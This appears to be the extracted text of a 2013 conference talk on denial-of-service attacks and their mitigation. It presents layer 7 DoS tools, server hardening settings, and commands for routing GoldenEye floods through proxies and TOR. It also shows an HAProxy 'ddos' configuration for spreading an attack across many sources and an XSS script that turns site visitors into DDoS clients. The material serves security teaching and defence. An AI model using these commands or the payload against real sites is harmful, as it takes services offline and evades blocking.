Good article on slow attacks mitigation
https://community.qualys.com/blogs/securitylabs/2011/11/02
/how-to-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
51. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache
Keep connections open and force cache regeneration.
First POC:
HULK – HTTP Unbearable Load King
Created on May 2012 by Barry Shteiman.
<http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
52. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache: HULK
Highly effective against IIS, Apache & Reverse Proxies
Caveat: Python, Urllib2 → Always sends headers on the
same order
Spiderlabs: modsecurity rule to mitigate URLLib attacks (Hulk)
(http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
53. Attacking Layer 7: Vectors & Tools
Randomization FTW!
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
54. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
●
●
●
●
Author: Me! :)
Initially born as a Hulk fork due to its fingerprinting weakness
●
●
Transformed further into a new independent HTTP DoS Tool
Born to test WAF blocking abilities under random and semi-natural
payloads
Available at https://github.com/jseidl/GoldenEye
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
55. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
Main Features:
GET, POST or Random HTTP methods
Random headers quantity
Random Headers content with legit values as per RFC
Better random block function to avoid fingerprinting
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Hackers to Hackers Conference 2012 – São Paulo, Brasil
Hackers to Hackers Conference 2012 – São Paulo, Brasil
56. Attacking Layer 7: Vectors & Tools
Mitigation
Granular page permissions
Filter POST where not needed
Filter querystring parameters where not needed
ProxyCache
Use caching proxies (ex: Varnish) and disable cache reload
KeepAlive e TimeOuts
Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and
equivalent in other webservers
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Hackers to Hackers Conference 2012 – São Paulo, Brasil
Hackers to Hackers Conference 2012 – São Paulo, Brasil
57. WebServer DoS Mitigation 101
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
58. WebServer DoS Mitigation 101
Apache
LimitRequestFields, LimitRequestFieldSize,
LimitRequestBody, LimitRequestLine,
LimitXMLRequestBody, TimeOut,
KeepAliveTimeOut, ListenBackLog,
MaxRequestWorkers [core]
RequestReadTimeout [mod_reqtimeout]
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
59. WebServer DoS Mitigation 101
Nginx
client_max_body_size, client_body_buffer_size,
client_header_buffer_size,
large_client_header_buffers, client_body_timeout,
client_header_timeout [core]
Modules: HttpLimitReqModule,
HttpLimitZoneModule
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
60. WebServer DoS Mitigation 101
IIS 6 & 7
IIS 6: connectionTimeout, HeaderWaitTimeout,
MaxConnections
IIS 7: <RequestLimits> maxAllowedContentLength,
maxQueryString, maxUrl
<headerLimits>
<Limits>/<WebLimits> connectionTimeout,
headerWaitTimeout, minBytesPerSecond
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
61. WebServer DoS Mitigation 101
USE A WEB APPLICATION FIREWALL (WAF)
Modsecurity (Apache / Nginx)
http://www.modsecurity.org/
NAXSI (Nginx)
http://code.google.com/p/naxsi/
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
62. Proxies and Layer 7 attacks
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
63. Proxies and Layer 7 attacks
Layer 3
Layer 7
Bad to attack through
proxies as they usually
have low bandwidth and
you might get banned
from them
Requires low bandwidth
Low network noise
Not degraded by low
output
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
64. Proxies and Layer 7 attacks
Why use proxies in HTTP attacks?
Simple answer
Geographic location at your will
Different source IPs
Can provide high anonymity
Largely available on the internet
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
65. Proxies and Layer 7 attacks
Attack pivoting by proxies
Tool:
Socat: Multipurpose Relay
http://www.dest-unreach.org/socat/
Also with SSL support:
HTTPS, IMAPS, POPS, LDAPS
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
66. Proxies and Layer 7 attacks
Attack pivoting by proxies: Regular Proxies
# socat TCP4LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
67. Proxies and Layer 7 attacks
Attack pivoting by proxies: TOR
# socat TCP4LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
68. Proxies and Layer 7 attacks
Bônus: Multi-TOR
The TOR client supports spawning as many instances and
opening as many circuits as necessary.
tor RunAsDaemon 1 CookieAuthentication 0
HashedControlPassword "pwd" ControlPort 4444
PidFile torN.pid SocksPort 5090 DataDirectory
data/torN
Tool:
Multi-TOR
https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instances
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
69. Proxies and Layer 7 attacks
Mitigating TOR with TORBlock
Blocking TOR-sourced access
TORBlock: IPTables-based blocking
Tool:
https://github.com/jseidl/torblock
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
70. Load Balancing Attacks
Meet Jericho
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
71. Load Balancing Attacks
Starring: HAProxy
“The Reliable, High Performance TCP/HTTP Load Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
72. Load Balancing Attacks
'Load-balanced' attacks anatomy
Attacker:
1. Open lots of socat tunnels to the victim, each one
from a different proxy (regular, TOR or both)
2. Put local port addresses (socat'ed ones) on
HAProxy
3. Place victim's domain on /etc/hosts
4. Attack normally from your favorite tool
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
73. Load Balancing Attacks
'Load-balanced' attacks anatomy
listen ddos 0.0.0.0:80
mode tcp
balance roundrobin
server inst1 localhost:8080
server inst2 localhost:8081
server inst3 localhost:8082
server inst4 localhost:8083
…
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
74. Load Balancing Attacks
'Load-balanced' attacks anatomy
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
75. Load Balancing Attacks
'Load-balanced' attacks anatomy
Proxy 1
Proxy 2
Attacker
HAProxy
Proxy 3
Proxy 4
Victim
Proxy 5
Proxy 6
Proxy 7
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
76. Load Balancing Attacks
'Load-balanced' attacks anatomy
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
77. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
●
●
Bypass connection-limiting
●
●
●
●
●
●
DoS → DDoS
Mutiple origin IPs
Origins can be from multiple countries
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
78. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
79. Load Balancing Attacks
More about the Jericho Attack Technique
http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
80. XSS D/DoS
What if an XSS flaw could turn your visitors into D/DoS
clients?
<script>
function DDoS() {
a = new Date()
unixepoch = a.getTime()
}
elm = document.createElement("img")
victimURL = "http://10.1.1.114/"
elm.src = victimURL+"?"+unixepoch
setInterval("DDoS()",1);
</script>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
81. Mobile-launched Denial-of-Service
PoC Tool: GoldenEye Mobile
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
82. Mobile-launched Denial-of-Service
Objective
Test if mobile devices alone could conduct a successful DoS
attack.
Test if equipment and configurations are able to deter DoS
attacks from mobile platforms.
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
83. Mobile-launched Denial-of-Service
Android: Limitations
Max 128 threads (Android 2.1)
Maximum number of concurrent sockets per thread: 30 (>30
too many open files)
Can we get better results if device is 'rooted'
(sysctl) ?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
84. Mobile-launched Denial-of-Service
Firepower
5 min test on an Apache webserver, default
configuration, in a Debian 6 virtual
machine, also with default configuration.
CPU Usage: u5.85 s4.52 cu0 cs0 2.37% CPU
load
Low CPU fingerprint
Server overloaded
(a.k.a. down)
https://github.com/jseidl/GoldenEye-Mobile
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
85. Mobile-launched Denial-of-Service
GoldenEye Mobile: Mitigation
GoldenEye Mobile uses HEAD method for maximum speed.
Easily blocked (Module: Mod_Rewrite)
RewriteEngine on
RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
RewriteRule .* [F]
mod_security
SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
86. Demo: DoS Fun
GoldenEye Mobile DoS Android Tool Demo!
http://bit.ly/GoldenEyeMDOS
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
87. Questions?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
88. Thanks!
– To Peace!
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
89. Thanks!
Thanks for your time!
jseidl@wroot.org / http://wroot.org
https://github.com/jseidl
http://www.slideshare.net/jseidl
@jseidl
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil